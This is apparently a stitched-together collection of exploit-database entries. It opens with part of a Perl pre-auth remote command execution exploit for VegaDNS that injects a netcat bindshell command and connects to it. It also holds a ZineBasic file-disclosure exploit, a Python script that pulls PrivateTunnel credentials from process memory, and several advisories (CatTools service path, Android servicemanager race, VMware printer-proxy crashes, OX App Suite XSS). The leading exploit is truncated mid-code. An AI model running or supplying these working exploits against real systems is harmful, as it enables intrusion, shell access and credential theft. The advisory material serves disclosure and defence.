▒░░░░░░▒▒▓▓▓▓▓▓▓█ ▐▓▓▓▓░░░▒▌░▓▓▓▓▒░ ░ ░░░░ ▐▒▌
▒▀░░░▒░░▓▒▓▓▓▓▓▌▀ ▐▓▓▓▓░░░▒▌░▓▓▓▓▒░ ░ ░░░░ ░▒▌
▓ ░▒░░░▀▀▒▓▓▓▓▓▌ ▐▓▓▓ ░░░░░░▓▓▓▓▒░ ░ ░ ░ ░▒▒▌
▓▓▒░▒░░▒▒▒▓▓▓▓▓▓▌ ▀▓▓▓▓▓▓▓▓▒░ ░░░ ░▄░▒▓▌
░ ▀▒▓▓▓▓▓▓▓▓▓▌▀▀ ▒░ ░ ░░▓▓▄
░ ▓ ▓▒░ ░░▒▀▒░▒▄
▄ ░ ▀ ▓▒░░▄░░░░░▀░░░▌░░▒
░ ▄▄▀ ▀▒▒▒▒▒▄ ▄░░░░ ▀▀
░░░ ▓▓▓▒▒▓▄░░ ░ ▐░▄ ░
░ ░▀░░ ▀▀▒▒▒▒▀ ▀▒ ▄
▄▄▄▄▄▄ ▄▀▒▓▌▄ ▀▄ ░ ░
▓▓▓▓▌▄ ▄▓▓▓▓▓▓▓ ▒ ▄ ░ ▄
▓▒▒▓▓▓▓▓▓▓▓▒▓▓▓▓▓ ░ ▀▓ ▄
▓▒▒▓▓▓▓▓▓▒▓▓▓▓▓▀ ░ ▀▄░▒▌▄▄
▄▄▄▓▓▓▓▓▓▓▓▓▓▓███▀ ▄▓▄▄▄▄▄▒▓▓▓▓▄
▄▓▓▓▓▓▓▓▓▓▒▓▓▓▓▓█ ▐▓████▓▓▓▓▓▓▒▓▓
▓▓▓▓▄▄▄▄▓▓▓▓▓▓▓█ ▐▓░░░▒▓▓▓▓▒▓▓
▐▓▓░▒▓▓▓▓▓▓▓
▐▓▓▓▓▓▓▒▒▓▌
▓▓▓▓█▒▒▒▒▒▒▒▓▓▌
██▒░░░░░░░▓▓███
};$b=qq{
██╗ ██╗███████╗ ██████╗ █████╗ ██████╗ ███╗ ██╗███████╗
██║ ██║██╔════╝██╔════╝ ██╔══██╗██╔══██╗████╗ ██║██╔════╝
██║ ██║█████╗ ██║ ███╗███████║██║ ██║██╔██╗ ██║███████╗
╚██╗ ██╔╝██╔══╝ ██║ ██║██╔══██║██║ ██║██║╚██╗██║╚════██║
╚████╔╝ ███████╗╚██████╔╝██║ ██║██████╔╝██║ ╚████║███████║
╚═══╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝╚═════╝ ╚═╝ ╚═══╝╚══════╝
██████╗ ███████╗███╗ ███╗ ██████╗ ████████╗███████╗
██╔══██╗██╔════╝████╗ ████║██╔═══██╗╚══██╔══╝██╔════╝
██████╔╝█████╗ ██╔████╔██║██║ ██║ ██║ █████╗
██╔══██╗██╔══╝ ██║╚██╔╝██║██║ ██║ ██║ ██╔══╝
██║ ██║███████╗██║ ╚═╝ ██║╚██████╔╝ ██║ ███████╗
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚══════╝
███████╗██╗ ██╗██████╗ ██╗ ██████╗ ██╗████████╗ ██████╗ ██╗ ██╗
██╔════╝╚██╗██╔╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝ ██╔══██╗╚██╗ ██╔╝
█████╗ ╚███╔╝ ██████╔╝██║ ██║ ██║██║ ██║ ██████╔╝ ╚████╔╝
██╔══╝ ██╔██╗ ██╔═══╝ ██║ ██║ ██║██║ ██║ ██╔══██╗ ╚██╔╝
███████╗██╔╝ ██╗██║ ███████╗╚██████╔╝██║ ██║ ██████╔╝ ██║
╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝
▄
▄█▀ ▀█▄▄
▄▄▓▀▀ ▀▓▄▄
▄▓▓▀ ▀█▓▄
▄▓▓▀ ▀▓▓▓▄
▄▓▓█▀ ▀▓▓▄▄
▄▓▓▓▀ ▀▓▓▓▄
▄▓▓▓▀ ▀▓▓▓▓
▓▓▓▓▀ ▀▓▓▓▓▄
▓▓▓▓█ ▀▓▓▓▓
▐▓▓▓▀ ▓▓▓▌
▓▓▓▌ ▐▓▓▓
▓▓▓▌ ▄▓▓▓
▓▓▓▓ ▄▓▓▓
▓▓▓▓▓▓▓▓▓▓██ ██▓▓▓▓▓▓▓▓▓▓
▀▀▀▀ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▀▀█
▄▄▓▓▓▓▓▓▓▓▓▓▓████▓▓▓▓▓▀ ▓▓▓▓▓████▓▓▓▓▓▓▓▓▓▓▓▄▄
▄▓▓▓▓█▀▀▀ ▓▓█ ▐▓▓ ▀▀▀█▓▓▓▓▓
▓▓▓ ▐▓█ ▀▓▌ ▓▓▓
█▓▌ ▓▀ ▌ ▀▓ ▐▓▓
▀▓ ▄ ▄▀ ▐ ▌ ▓▓ ▐▄ █ ▀▓▄ ▄▌ ▓▀
█ ▀▓▄ ▄▓█ ▄▓ ▐▓▓▌ █▓ ▀▓▄▄ ▄▓▀ ▓
▄▌ █▓▓▓▓▓▀ ▓▓▓▄▓▌▐▓▄▄▓▓ ▀▓▓▓▄▓▓▀ ▐▄
▓▓ █▀▀ ▀█▀ ▀▓
▓▓ ▄ ▄▀ ▄ ▄ ▓▓
▓▓▓▄ ▄▓▀ ▄█ ▄ ▄ ▀▄ ▀▓▄ ▓▓▓
████▀▀▀▀▀▀▀▀▀ ▓▀ ▄ ▄ ▓ █ ▓ ▀▀▀▀▀▀▀▀▀████
▄▓▀ ▓ ▄▌▐ ▐ ▌ ▌▐▓ ▓ ▓▄
▄▓ ▄▄▓▌▐▓ ▐ ▓ ▓ ▓ ▐▄ ▌ ▓▌▐▓▄▄ ▓▓
▓▓▓█▀▀ ▀█▓▓▌ ▓ ▐▓ █▌ ▓ ▓▓█▀ ▀▀█▓▓▓
█▀ ▀ ▐▓▄▓▌ ▐▓▄▓▌ ▀ ▀█
▀ ▀▀
___ .___ .______ ._______._____ .___.__ ._______ .____ .___
.___ | |: __|: __ \ : .____/:_ ___\ : | \ : .___ \ | |___ | |
: | /\| || : || \____|| : _/\ | |___| : || : | || | || |
| |/ : || || : \ | / \| / || . || : || : || |/\
| / || || |___\|_.: __/|. __ ||___| | \_. ___/ | || / \
|______/|___||___||___| :/ :/ |. | |___| :/ |. _____/ |______/
: : :/ : :/
: : :
};$g=qq{
██████╗ ██████╗ ███████╗███████╗████████╗███████╗
██╔════╝ ██╔══██╗██╔════╝██╔════╝╚══██╔══╝╚══███╔╝
██║ ███╗██████╔╝█████╗ █████╗ ██║ ███╔╝
██║ ██║██╔══██╗██╔══╝ ██╔══╝ ██║ ███╔╝
╚██████╔╝██║ ██║███████╗███████╗ ██║ ███████╗
╚═════╝ ╚═╝ ╚═╝╚══════╝╚══════╝ ╚═╝ ╚══════╝
To all the people with mad skills who share their knowledge:
TecR0c, mr_me, action_dk, bcoles, TheColonial, jduck, hdmoore, rgod, TESO,
mdowd, kernelpool, silviocesare, egyp7, w00 w00, felinemenace, corelan,
lgandx, _sinne3r, alexsotirov, fjserna, solardiz, l0pth, cDc, therealsaumil,
laughing_mantis, g0tm1k, nmrc, and many many more....
};$a=qq^
█████╗ ███╗ ██╗ █████╗ ██╗ ██╗ ██╗███████╗██╗███████╗
██╔══██╗████╗ ██║██╔══██╗██║ ╚██╗ ██╔╝██╔════╝██║██╔════╝
███████║██╔██╗ ██║███████║██║ ╚████╔╝ ███████╗██║███████╗
██╔══██║██║╚██╗██║██╔══██║██║ ╚██╔╝ ╚════██║██║╚════██║
██║ ██║██║ ╚████║██║ ██║███████╗██║ ███████║██║███████║
╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚══════╝╚═╝ ╚══════╝╚═╝╚══════╝l
VegaDNS is a tinydns administration tool written in PHP to allow easy
administration of DNS records through a web browser.
-- http://www.vegadns.org
The file axfr_get.php allows unauthenticated access and fails to correctly
apply input escaping to all variables that is based on user input. This
allows an attacker to inject shell syntax constructs to take control of the
command execution.
The following code from axfr_get.php shows how the variable $file becomes
tainted trough the $domain variable which is tainted from direct user input.
The application tries to prevent this by escaping the $domain and $hostname
variables, but fails to escape the $file variable.
---------------------------cut---------------------------
* NOTE:
* This functionality ONLY exists outside of the main application
* because tcplient kept dying fatally due to file descriptor 7
* being unavailable, which only occurs AFTER session_start() is
* called.
*
*/
require_once 'src/config.php';
// CHECKS
// Make sure the hostname was given
if(!isset($_REQUEST['hostname']) || $_REQUEST['hostname'] == "") {
echo "ERROR: no hostname given\n";
exit;
}
// Make sure that some domains were given
if(!isset($_REQUEST['domain']) || $_REQUEST['domain'] == "") {
echo "ERROR: no domain was supplied\n";
exit;
}
$domain = $_REQUEST['domain'];
$hostname = $_REQUEST['hostname'];
$rand = rand();
$file = "/tmp/$domain.$rand";
$command = "$dns_tools_dir/tcpclient -R '".escapeshellcmd($hostname)."' 53 $dns_tools_dir/axfr-get '".escapeshellcmd($domain)."' $file $file.tmp 2>&1";
exec($command, $out);
---------------------------end---------------------------
███████╗██╗ ██╗██████╗ ██╗ ██████╗ ██╗████████╗
██╔════╝╚██╗██╔╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝
█████╗ ╚███╔╝ ██████╔╝██║ ██║ ██║██║ ██║
██╔══╝ ██╔██╗ ██╔═══╝ ██║ ██║ ██║██║ ██║
███████╗██╔╝ ██╗██║ ███████╗╚██████╔╝██║ ██║
╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝
^;
print "$izd\n"." " x 17 . "VegaDNS pre-auth RCE exploit by \@Wireghoul\n";
print " "."=" x 50 ."[justanotherhacker.com]==\n";
&usage if ($ARGV[0] !~ m!.+://([^/:]+)!);
$h=$1;
print " . . . Locating netcat\n";
$cmd='which+nc';
$t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev";
$z=`curl -s -k '$t'`;
if ($z !~ m{/nc}) {
print " ! ! ! netcat not found! Manual exploitation required:\n";
print " $ARGV[0]/axfr_get?hostname=izunadrop&domain=%3bCMD%3b\n";
exit 1;
}
print " . . . netcat found: $z\n";
print " . . . Performing IZUNA DROP!\n";
# ← · ↑ · → · ↓ · ↖ · ↗ · ↘ · ↙
print " ↓ ↓ ↑ *k* → → *p*\n";
$cmd="$z+-e+/bin/sh+-lp+4444";
$t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev";
$z=`curl -m 3 -s -k '$t &'`;
print $vg."\n";
print " . . . K.O ! ! ! Connecting to bindshell on $h port 4444\n";
system("nc -v $h 4444");
sub usage { print "Usage $0 http://host/path/to/vegadns\n\n$ARGV[0]"; exit;
# Title: ZineBasic 1.1 Remote File Disclosure Exploit
# Author: bd0rk || East Germany former GDR
# Tested on: Ubuntu-Linux
# Vendor: http://w2scripts.com/news-publishing/
# Download: http://downloads.sourceforge.net/project/zinebasic/zinebasic/v1.1/zinebasic_v1.1_00182.zip?r=https%3A%2F%2Fsourceforge.net%2Fprojects%2Fzinebasic%2F&ts=1474313108&use_mirror=master
# Twitter: twitter.com/bd0rk
#Greetings: zone-h.org, Curesec GmbH, SiteL GmbH, i:TECS GmbH, rgod, GoLd_M
----------------------------------------------------------------------------------
=> Vulnerable sourcecode in /zinebasic_v1.1_00182/articleImg/delImage.php line 12
=> Vulnerable snippet: $id = $_GET['id'];
----------------------------------------------------------------------------------
Exploitcode with little error inline 25-->'Gainst script-kiddies! || Copy&Paste:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/usr/bin/perl
use LWP::Simple;
use LWP::UserAgent;
sub ex()
{
print "Usage: perl $0 someone.com /ZineBasic_Dir/\n";
print "\nZineBasic 1.1 Remote File Disclosure Exploit\n";
print "\ Contact: twitter.com/bd0rk\n";
($host, $path, $under, $file,) = @ARGV;
$under="/articleImg/";
$file="delImage.php?id=[REMOTE_FILE]";
my $target = "http://".$host.$path.$under.$file;
my $usrAgent = LWP::UserAgent->new();
my $request = $usrAgent->get($target,":content_file"=>"[REMOTE_FILE]");
if ($request->is_success)
{
print "$target <= JACKPOT!\n\n";
print "etc/passwd\n";
exit();
}
else
{
print "Exploit $target FAILED!\n[!].$request->status_line.\n";
exit();
}
Document Title:
================
SolarWinds Kiwi CatTools Unquoted Service Path Privilege Escalation Vulnerability
Author:
========
Halil Dalabasmaz
Release Date:
==============
29 SEP 2016
Product & Service Introduction:
================================
Kiwi CatTools saves you time by automating common network configuration
tasks including the ability to automatically change and backup network
device configurations. Kiwi CatTools is a software application used by
network administrators to automate many of the tasks they
perform on a daily basis. This is the no longer available freeware version.
Kiwi CatTools automates configuration backups and management on routers,
switches and firewalls. It provides e-mail notification and compare reports
highlighting config changes. Supports Telnet, SSH, TFTP and SNMP. Kiwi CatTools
is designed by network engineers, for network engineers. We understand the tasks
you need to perform and how you work. CatTools is here to make your life easier.
It does this by scheduling batch jobs,automating changes, and reporting on the
things that matter to you as a network administrator.
Vendor Homepage:
=================
http://www.kiwisyslog.com/products/kiwi-cattools/product-overview.aspx
Vulnerability Information:
===========================
The application can be install on Windows system as a service by default service
installation selected. The application a 32-bit application and the default
installation path is "C:\Program Files (x86)" on Windows systems. This could
potentially allow an authorized but non-privileged local user to execute arbitrary
code with elevated privileges on the system. The application work on "Local System"
privileges. A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot.
C:\Windows\system32>sc qc CatTools
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: CatTools
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\CatTools3\CatTools_Service.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : CatTools
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
Vulnerability Disclosure Timeline:
=========================
13 AUG 2016 - Contact With Vendor
15 AUG 2016 - Vendor Response
15 SEP 2016 - No Response From Vendor
19 SEP 2016 - Public Disclosure
Discovery Status:
==================
Published
Affected Product(s):
=====================
SolarWinds Kiwi CatTools 3.11.0
Tested On:
===========
Windows 7 Ultimate 64-Bit SP1 (EN)
Disclaimer & Information:
==========================
The information provided in this advisory is provided as it is without
any warranty. BGA disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular
purpose. BGA or its suppliers are not liable in any case of damage, including
direct, indirect, incidental, consequential loss of business profits or
special damages.
Domain: www.bgasecurity.com
Social: twitter.com/bgasecurity
Contact: advisory@bga.com.tr
Copyright © 2016 | BGA Security LLC
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=851
This is very similar to forshaw's bug (<https://code.google.com/p/android/issues/detail?id=200617>, <https://bugs.chromium.org/p/project-zero/issues/detail?id=727>).
The servicemanager, when determining whether the sender of a binder transaction is authorized to register a service via SVC_MGR_ADD_SERVICE, looks up the sender's SELinux context using getpidcon(spid), where spid is the value of the sender_pid field in the binder_transaction_data that was received from the binder driver.
This is problematic because getpidcon($pid) is only safe to use if the caller either knows that the process originally referenced by $pid can't transition from zombie to dead (normally because it is the parent or ptracer of $pid) or if the caller can validate that the process referenced by $pid can not have spawned before $pid referred to the correct process based on the age of the process that $pid points to after the getpidcon() call. (The same thing applies to pretty much any API that refers to processes using PIDs.)
This means that an attacker can, at least theoretically, register arbitrary services that would normally be provided by the system_server if he can execute / cause execution of the following operations in the right order:
- The main exploit process $exploit forks, creates process $child
- $child does $binder_fd = open("/dev/binder", ...)
- $child forks, creates process $subchild
- $child exits. The binder_proc belonging to $binder_fd still holds a reference
to $child. $child transitions to zombie status.
- The exploit repeatedly forks processes that instantly die until there are no unallocated
PIDs between ns_last_pid and $child's PID.
- $subchild sends a SVC_MGR_ADD_SERVICE binder message to the service manager
- the service manager receives the binder message. The kernel fills the
sender_pid field with the result of `task_tgid_nr_ns(sender, [...])`,
where `sender` is `t->from->proc->tsk`, the task_struct of $child.
- $exploit uses `waitpid()` to transition $child from zombie to dead status
- $exploit sends a HANDLE_APPLICATION_STRICT_MODE_VIOLATION_TRANSACTION
binder message to system_server
- system_server launches a new worker thread
(in ActivityManagerService.logStrictModeViolationToDropBox)
- the service manager calls getpidcon()
- system_server's worker thread dies
As far as I can tell, this exploit approach contains the following race conditions:
- If $exploit calls waitpid() before the service manager has performed the binder
read (more accurately, before the task_tgid_nr_ns call), the service manager sees
PID 0. This race isn't hard to win, but it would help to have some primitive to either stall
the service manager after the task_tgid_nr_ns call or at least detect whether it has
performed the binder read. On older Android versions, voluntary_ctxt_switches
in /proc/$pid/status might have helped with that, but nowadays, that's blocked.
When this race condition fails, you'll get an SELinux denial with
scontext=servicemanager.
- If the service manager calls getpidcon() before the system_server has launched a
worker thread, the call will either fail (if there is no such PID) or return the
not-yet-reaped $child process. Again, having a primitive for stalling the service manager
would be useful here.
When this race condition fails, it will cause either an SELinux denial with
scontext=untrusted_app or an "failed to retrieve pid context" error from the
service manager.
- If the system_server's worker thread dies before getpidcon(), getpidcon() will fail.
To avoid this race, it would be very helpful to be able to spawn a thread in system_server
that has a controlled or at least somewhat longer lifetime.
Because of the multiple races, it is hard to hit this bug, at least without spending days on finding ways to eliminate races or widen race windows, optimizing the exploit to not cycle through the whole pid range for every attempt and so on. Because of that, I decided to run my PoC on a patched Android build (based on android-6.0.1_r46) with the following modifications to show that, while the race window is very hard to hit, there is such a race:
-------
$ repo diff
project frameworks/base/
diff --git a/services/core/java/com/android/server/am/ActivityManagerService.java b/services/core/java/com/android/server/am/ActivityManagerService.java
index 33d0a9f..371ecd7 100644
--- a/services/core/java/com/android/server/am/ActivityManagerService.java
+++ b/services/core/java/com/android/server/am/ActivityManagerService.java
@@ -12269,6 +12269,9 @@ public final class ActivityManagerService extends ActivityManagerNative
if (report.length() != 0) {
dbox.addText(dropboxTag, report);
}
+ try {
+ Thread.sleep(2000);
+ } catch (InterruptedException e) {}
}
}.start();
return;
project frameworks/native/
diff --git a/cmds/servicemanager/service_manager.c b/cmds/servicemanager/service_manager.c
index 7fa9a39..0600eb1 100644
--- a/cmds/servicemanager/service_manager.c
+++ b/cmds/servicemanager/service_manager.c
@@ -7,6 +7,7 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
+#include <unistd.h>
#include <private/android_filesystem_config.h>
@@ -204,6 +205,9 @@ int do_add_service(struct binder_state *bs,
if (!handle || (len == 0) || (len > 127))
return -1;
+ if (uid > 1000)
+ sleep(2);
+
if (!svc_can_register(s, len, spid)) {
ALOGE("add_service('%s',%x) uid=%d - PERMISSION DENIED\n",
str8(s, len), handle, uid);
-------
These modifications widen the race windows sufficiently to be able to hit the bug with a few tries.
On the modified build, my PoC causes the following logcat output, demonstrating that the clipboard service has been replaced successfully:
06-15 21:41:00.470 11876 11876 E FIELD--FIELD: accessFlags
06-15 21:41:00.470 11876 11876 E FIELD--FIELD: declaringClass
06-15 21:41:00.470 11876 11876 E FIELD--FIELD: dexFieldIndex
06-15 21:41:00.470 11876 11876 E FIELD--FIELD: offset
06-15 21:41:00.470 11876 11876 E FIELD--FIELD: type
06-15 21:41:00.470 11876 11876 E FIELD--FIELD: ORDER_BY_NAME_AND_DECLARING_CLASS
06-15 21:41:00.480 11876 11876 W racer : NATIVE CODE: trying attack...
06-15 21:41:01.490 11876 11876 W racer : NATIVE CODE: child_pid == unused_pid + 1
06-15 21:41:01.490 11876 11876 W racer : NATIVE CODE: cycle_to_pid...
06-15 21:41:02.900 11876 11876 W racer : NATIVE CODE: cycle_to_pid done
06-15 21:41:04.910 992 992 E ServiceManager: SELinux: getpidcon(pid=11993) failed to retrieve pid context.
06-15 21:41:04.910 992 992 E ServiceManager: add_service('clipboard',63) uid=10052 - PERMISSION DENIED
06-15 21:41:08.920 11876 11876 W racer : NATIVE CODE: pid of last try: 11993
06-15 21:41:08.920 11876 11876 W racer : NATIVE CODE: trying attack...
06-15 21:41:09.930 11876 11876 W racer : NATIVE CODE: child_pid == unused_pid + 1
06-15 21:41:09.930 11876 11876 W racer : NATIVE CODE: cycle_to_pid...
06-15 21:41:11.330 11876 11876 W racer : NATIVE CODE: cycle_to_pid done
06-15 21:41:13.340 992 992 E ServiceManager: add_service('clipboard',63) uid=10052 - ALREADY REGISTERED, OVERRIDE
(Also, to further verify the success: After running the PoC, clipboard accesses in newly spawned apps cause null reference exceptions because the PoC's binder thread has been released in the meantime.)
The issue was tested in the android emulator, with a aosp_x86_64-eng build of the patched android-6.0.1_r46 release.
I have attached the PoC apk (with native code for aarch64 and x86_64; I'm not sure whether the PoC compiles correctly for 32bit) and the Android project tree - but as mentioned earlier, note that the PoC won't work on a build without my patches. If you want to compile it yourself, first run `aarch64-linux-gnu-gcc -static -o app/src/main/jniLibs/arm64-v8a/libracer.so racer.c -Wall -std=gnu99 && gcc -static -o app/src/main/jniLibs/x86_64/libracer.so racer.c` to compile the binaries, then build the project in Android Studio.
I believe that the proper way to fix this issue would be to let the binder driver record the sender's SELinux context when a transaction is sent and then either let the recipient extract the current transaction's SELinux context via an ioctl or store the SELinux context in the binder message. PIDs should not be used during the SELinux context lookup.
Regarding impact:
It looks as if the vulnerable code in the service manager is reachable from isolated_app context, although being isolated is probably going to make it even more difficult to trigger the bug.
After a service is replaced, already-running code should usually continue to use the old service because that reference is cached.
If there is e.g. some system_app that performs permissions checks (which use the "permission" service), it might be possible to bypass such permission checks using this bug, by replacing the real permission service with one that always grants access.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40381.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=850
As already discussed in a number of reports in this tracker (#285, #286, #287, #288, #289, #292), VMware Workstation (current version 12.1.1 build-3770994) ships with a feature called "Virtual Printers", which enables the virtualized operating systems to access printers installed on the Host. Inside the VM, the communication takes place through a COM1 device, and the incoming data is handled by a dedicated "vprintproxy.exe" process on the Host, as launched by the "vmware-vmx.exe" service. Administrative privileges are not required to access COM1 in the guest, at least on Windows.
The vprintproxy.exe is a significant attack surface for potential VM escapes. Due to its nature, the application implements support for a variety of complex protocols and file formats, such as the printing protocol, EMFSPOOL format, and further embedded EMFs, fonts, images etc. This report addresses a multitude of bugs in the handling of JPEG2000 images embedded in a custom record 0x8000 inside EMF, as implemented in the TPView.DLL library extensively used by vprintproxy.exe.
The version of the TPView.DLL file referenced in this report is 9.4.1045.1 (md5sum b6211e8b5c2883fa16231b0a6bf014f3).
The CTPViewDoc::WriteEMF function (adddress 0x100518F0) iterates over all EMF records found in the EMFSPOOL structure sent over COM1 for printing, and performs special handling of some of them. One such record is a custom type 0x8000, expected to store a JPEG2000 image wrapped in a structure similar to that of a EMF_STRETCHDIBITS record. The handler at 0x100516A0, and more specifically a further nested function at 0x1003C000 performs complete parsing of the J2K format, opening up the potential for software vulnerabilities. An example of a bug in that code area discovered in the past is a stack-based buffer overflow in the processing of record 0xff5c (Quantization Default), reported by Kostya Kortchinsky in bug #287.
Since the source code of the JPEG2000 implementation used by VMware is not publicly available, and the file format is sufficiently complex that a manual audit sounds like a dire and very ineffective option to find bugs, I have set up a fuzzing session to automate the process. As a result, with the PageHeap option enabled in Application Verifier for vprintproxy.exe, the fuzzer has managed to trigger hundreds of crashes, in a total of 39 unique code locations. Below is a list of different instructions which generated a crash, with a brief description of the underlying reason.
+----------------------------+-----------------------------------------------+
| Instruction | Reason |
+----------------------------+-----------------------------------------------+
| add [eax+edx*4], edi | Heap buffer overflow |
| cmp [eax+0x440], ebx | Heap out-of-bounds read |
| cmp [eax+0x8], esi | Heap out-of-bounds read |
| cmp [edi+0x70], ebx | Heap out-of-bounds read |
| cmp [edi], edx | Heap out-of-bounds read |
| cmp dword [eax+ebx*4], 0x0 | Heap out-of-bounds read |
| cmp dword [esi+eax*4], 0x0 | Heap out-of-bounds read |
| div dword [ebp-0x24] | Division by zero |
| div dword [ebp-0x28] | Division by zero |
| fld dword [edi] | NULL pointer dereference |
| idiv ebx | Division by zero |
| idiv edi | Division by zero |
| imul ebx, [edx+eax+0x468] | Heap out-of-bounds read |
| mov [eax-0x4], edx | Heap buffer overflow |
| mov [ebx+edx*8], eax | Heap buffer overflow |
| mov [ecx+edx], eax | Heap buffer overflow |
| mov al, [esi] | Heap out-of-bounds read |
| mov bx, [eax] | NULL pointer dereference |
| mov eax, [ecx] | NULL pointer dereference |
| mov eax, [edi+ecx+0x7c] | Heap out-of-bounds read |
| mov eax, [edx+0x7c] | Heap out-of-bounds read |
| movdqa [edi], xmm0 | Heap buffer overflow |
| movq mm0, [eax] | NULL pointer dereference |
| movq mm1, [ebx] | NULL pointer dereference |
| movq mm2, [edx] | NULL pointer dereference |
| movzx eax, byte [ecx-0x1] | Heap out-of-bounds read |
| movzx eax, byte [edx-0x1] | Heap out-of-bounds read |
| movzx ebx, byte [eax+ecx] | Heap out-of-bounds read |
| movzx ecx, byte [esi+0x1] | Heap out-of-bounds read |
| movzx ecx, byte [esi] | Heap out-of-bounds read |
| movzx edi, word [ecx] | NULL pointer dereference |
| movzx esi, word [edx] | NULL pointer dereference |
| push dword [ebp-0x8] | Stack overflow (deep / infinite recursion) |
| push ebp | Stack overflow (deep / infinite recursion) |
| push ebx | Stack overflow (deep / infinite recursion) |
| push ecx | Stack overflow (deep / infinite recursion) |
| push edi | Stack overflow (deep / infinite recursion) |
| push esi | Stack overflow (deep / infinite recursion) |
| rep movsd | Heap buffer overflow, Heap out-of-bounds read |
+----------------------------+-----------------------------------------------+
Considering the volume of the crashes, I don't have the resources to investigate the root cause of each of them, and potentially deduplicate the list even further. My gut feeling is that the entirety of the crashes may represent 10 or more different bugs in the code.
Attached is a Python script which can be used to test each particular JPEG2000 sample: it is responsible for wrapping it in the corresponding EMF + EMFSPOOL structures and sending to the COM1 serial port on the guest system. It is a reworked version of Kostya's original exploit from bug #287. In the same ZIP archive, you can also find up to three samples per each crash site listed above.
It was empirically confirmed that some of the heap corruptions can be leveraged to achieve arbitrary code execution, as when the Page Heap mechanism was disabled, the process would occasionally crash at invalid EIP or a CALL instruction referencing invalid memory addresses (vtables).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40399.zip
#####
# PrivateTunnel Client v2.7.0 (x64) Local Credentials Disclosure After Sign out Exploit
# Tested on Windows Windows 7 64bit, English
# Vendor Homepage @ https://www.privatetunnel.com
# Date 14/09/2016
# Bug Discovery by:
#
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
# http://www.black-rose.ml
#
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
# https://1-33-7.com/
#
#####
# PrivateTunnel Client v2.7.0 is vulnerable to local credentials disclosure after the user is logged out.
# It seems that PrivateTunnel does store the supplied credentials while the user is logged in and after sign out in a plaintext format in memory process.
# A potential attacker could reveal the supplied username and password in order to gain access to PrivateTunnel account.
#
# Authors are not responsible for any misuse or demage which caused by use of this script code.
# Please use responsibly.
#####
# Proof-Of-Concept Code:
import time
import urllib
from winappdbg import Debug, Process
usr = ''
pwd = ''
found = 0
filename = "privatetunnel2.7.0.exe"
process_pid = 0
memory_dump = []
debug = Debug()
try:
print "###########################################################################"
print "# PrivateTunnel v2.7.0 Local Credentials Disclosure Exploit After Sign out#"
print "#\t\tBug Discovery by Yakir Wizman, Victor Minin\t\t #"
print "#\t\tTested on Windows Windows 7 64bit, English\t\t #"
print "#\t\t\tPlease use responsibly.\t\t\t\t #"
print "###########################################################################\r\n"
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid is not 0:
print "[+] Found process with pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
user_pattern = '\x20\x22\x70\x61\x73\x73\x77\x6F\x72\x64\x22\x20\x3A\x20\x22(.*)\x22\x2C\x0A\x20\x20\x20\x22\x75\x73\x65\x72\x6E\x61\x6D\x65\x22\x20\x3A\x20\x22(.*)\x22\x0A'
for address in process.search_regexp(user_pattern):
memory_dump.append(address)
try:
usr = memory_dump[0][2].split('"username" : "')[1].replace('"\n', '')
pwd = memory_dump[0][2].split('"password" : "')[1].split('",')[0]
except:
pass
print ""
if usr != '' and pwd !='':
found = 1
print "[+] PrivateTunnel Credentials found!\r\n----------------------------------------"
print "[+] Username: %s" % usr
print "[+] Password: %s" % pwd
if found == 0:
print "[-] Credentials not found!"
else:
print "[-] No process found with name '%s'." % (filename)
debug.loop()
finally:
debug.stop()
Product: OX App Suite
Vendor: OX Software GmbH
Internal reference: 46484 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 7.8.2 and earlier
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.2-rev46, 7.6.3-rev14, 7.8.0-rev29, 7.8.1-rev16, 7.8.2-rev5
Vendor notification: 2016-06-09
Solution date: 2016-08-01
Public disclosure: 2016-09-13
CVE reference: CVE-2016-5740
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Description fields of ressources could be used to inject malicious HTML/JS code. When scheduling group appointments and adding such a ressource, the injected code gets executed in the context of a user when viewing appointment details.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.). Note however that explicit permissions are required to create or modify resources in a way that they could contain script code.
Steps to reproduce:
